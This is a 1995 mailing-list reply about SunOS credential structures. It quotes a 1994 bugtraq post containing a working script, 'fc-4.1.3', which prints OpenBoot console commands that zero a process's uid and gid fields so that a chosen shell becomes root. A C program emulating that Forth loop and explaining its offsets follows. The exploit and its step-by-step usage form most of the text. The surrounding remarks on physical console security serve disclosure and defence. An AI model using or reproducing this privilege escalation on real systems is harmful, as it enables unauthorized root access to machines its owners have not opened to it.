Re: Pointer to a process's credential structure?

Scott Fritchie (fritchie@FreeNet.MSP.MN.US)
Fri, 14 Apr 1995 13:47:26 -0500

>>>>> On Fri, 14 Apr 1995 09:17:25 +0800, patrick@oes.amdahl.com (Patrick Horgan) said:

> Browsing through some archived "bugtraq" messages I discovered a
> really nifty way to change the effective and real userid of any
> process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x).
> That particular hole is demonstrably exploitable under Solaris 2.3
> (and I assume Solaris 2.4), except for one little problem....
> 

ph> I'd have to think...we used to be able to do this via the prom
ph> debugger.

I'll attach the message I found browsing spy.org's Web server at the
end of this one.  It will probably be a good memory refresher.  :-)

ph> We wouldn't have to know any address ahead of time, but
ph> could walk the kernel's tables in the debugger from the prom
ph> prompt.

I'd thought of that, too.  More work, though -- SunOS 4's "pstat" is
so kind as to give almost the exact address needed.

ph> I'd hope everyone knows
ph> that physical security is important, and that if you don't have it
ph> you're in deep doo-doo.

You've got a point there.  At St. Olaf, we've got our machines
"protected" by the root password if you attempt to boot into
single-user mode (and haven't really cared all that much if someone
went to the trouble of bringing their own Sun-style-bootable drive),
but finding out about the monitor attack was a cool (in a twisted
sense) discovery.  "eeprom security-mode=command (?)", here we come.

-Scott
---
Scott E. Lystig Fritchie, UNIX Systems Manager       Co-founder:
Academic Computing Center, St. Olaf College          Twin Cities Free-Net
1510 St. Olaf Ave., Northfield, MN  55057            Organizing Committee
fritchie@stolaf.edu ... 507/646.3407                 (Minneapolis/St. Paul, MN)
"Activism is the killer app for the net." -- Steven Cherry <stc@panix.com>

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

#!/bin/sh -

# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ -z "$1" ]; then
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID
# (pstat -u prints it on the "procp" line).
procp=`pstat -u "$1" | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a'; you should then see the following message:
        Type  'go' to resume
        ok

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes:
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0
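What the Forth line the script prints actually does is easy to misread, so here is a small C model of it, added as an example for this archive page (it is not code from the original posts). It emulates an OpenBoot-style big-endian memory with the words `l@` (32-bit fetch) and `w!` (16-bit store), fills in a proc struct whose cred pointer sits at offset 0x4c, and runs the loop `b 2 do 0 procp 4c + l@ i + w! 2 +loop`. Forth's `do` takes `(limit start)`, so the index runs 2, 4, 6, 8, 0xa: five halfwords of the cred are zeroed and offset 0 is left alone. The addresses (`PROCP`, `CREDP`) and the 16-bit `ucred` field layout (`cr_ref`, `cr_uid`, `cr_gid`, `cr_ruid`, `cr_rgid`, `cr_groups[0]`) are assumptions for the model, chosen to match a BSD-style cred and the script's halfword stores; the page itself only gives the 0x4c offset.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy "kernel memory"; none of these are real SunOS addresses. */
#define MEM_SIZE  0x2000u
#define PROCP     0x1000u   /* assumed address of the target proc (pstat -u gives the real one) */
#define CREDP     0x1800u   /* assumed address of that proc's ucred */
#define UCRED_OFF 0x4cu     /* offset of the cred pointer inside proc, as in the script */

static uint8_t mem[MEM_SIZE];

/* Assumed BSD-style ucred with 16-bit fields (offsets in bytes). */
enum { CR_REF = 0, CR_UID = 2, CR_GID = 4, CR_RUID = 6, CR_RGID = 8, CR_GROUPS0 = 0xa };

/* l@ : big-endian 32-bit fetch (SPARC is big-endian). */
static uint32_t l_fetch(uint32_t a) {
    return ((uint32_t)mem[a] << 24) | ((uint32_t)mem[a + 1] << 16) |
           ((uint32_t)mem[a + 2] << 8) | (uint32_t)mem[a + 3];
}
/* l! : big-endian 32-bit store (used only to build the scenario). */
static void l_store(uint32_t a, uint32_t v) {
    mem[a] = (uint8_t)(v >> 24); mem[a + 1] = (uint8_t)(v >> 16);
    mem[a + 2] = (uint8_t)(v >> 8); mem[a + 3] = (uint8_t)v;
}
/* w@ / w! : big-endian 16-bit fetch and store. */
static uint16_t w_fetch(uint32_t a) { return (uint16_t)((mem[a] << 8) | mem[a + 1]); }
static void w_store(uint32_t a, uint16_t v) { mem[a] = (uint8_t)(v >> 8); mem[a + 1] = (uint8_t)v; }

/* Scenario: an unprivileged process (uid/gid 1234/20) whose cred has 3 references. */
static void setup(void) {
    memset(mem, 0, sizeof mem);
    l_store(PROCP + UCRED_OFF, CREDP);
    w_store(CREDP + CR_REF, 3);
    w_store(CREDP + CR_UID, 1234);
    w_store(CREDP + CR_GID, 20);
    w_store(CREDP + CR_RUID, 1234);
    w_store(CREDP + CR_RGID, 20);
    w_store(CREDP + CR_GROUPS0, 20);
}

/* The script's line:  b 2 do 0 procp 4c + l@ i + w! 2 +loop
 * DO takes (limit start) = (0xb 2), +LOOP adds 2, so i = 2,4,6,8,0xa.
 * Each pass: push 0, push (l@ (procp+4c)) + i, w! stores the halfword 0 there.
 * Offset 0 (the reference count in the assumed layout) is never touched.
 * Returns the cred address the loop dereferenced. */
static uint32_t run_forth_line(uint32_t procp, uint32_t ucred_off) {
    uint32_t credp = l_fetch(procp + ucred_off);
    for (uint32_t i = 2; i < 0xb; i += 2)
        w_store(credp + i, 0);
    return credp;
}

/* 1 if, after the loop, the process has uid/gid 0 and its refcount survived. */
static int became_root(void) {
    setup();
    uint32_t credp = run_forth_line(PROCP, UCRED_OFF);
    return credp == CREDP
        && w_fetch(credp + CR_UID) == 0 && w_fetch(credp + CR_GID) == 0
        && w_fetch(credp + CR_RUID) == 0 && w_fetch(credp + CR_RGID) == 0
        && w_fetch(credp + CR_REF) == 3;
}

int main(void) {
    setup();
    uint32_t credp = run_forth_line(PROCP, UCRED_OFF);
    printf("cred at 0x%x: ref=%u uid=%u gid=%u ruid=%u rgid=%u groups[0]=%u\n",
           (unsigned)credp, (unsigned)w_fetch(credp + CR_REF),
           (unsigned)w_fetch(credp + CR_UID), (unsigned)w_fetch(credp + CR_GID),
           (unsigned)w_fetch(credp + CR_RUID), (unsigned)w_fetch(credp + CR_RGID),
           (unsigned)w_fetch(credp + CR_GROUPS0));
    return became_root() ? 0 : 1;
}
```

The point the model makes is that the loop bounds are not arbitrary: starting the index at 2 rather than 0 is what keeps the first halfword of the cred intact, and every store is a 16-bit halfword because the fields being overwritten are 16 bits wide in this layout. On a machine where the field widths or the 0x4c offset differ, the same line would corrupt something else, which is why the original script says the offset is "the only important information here".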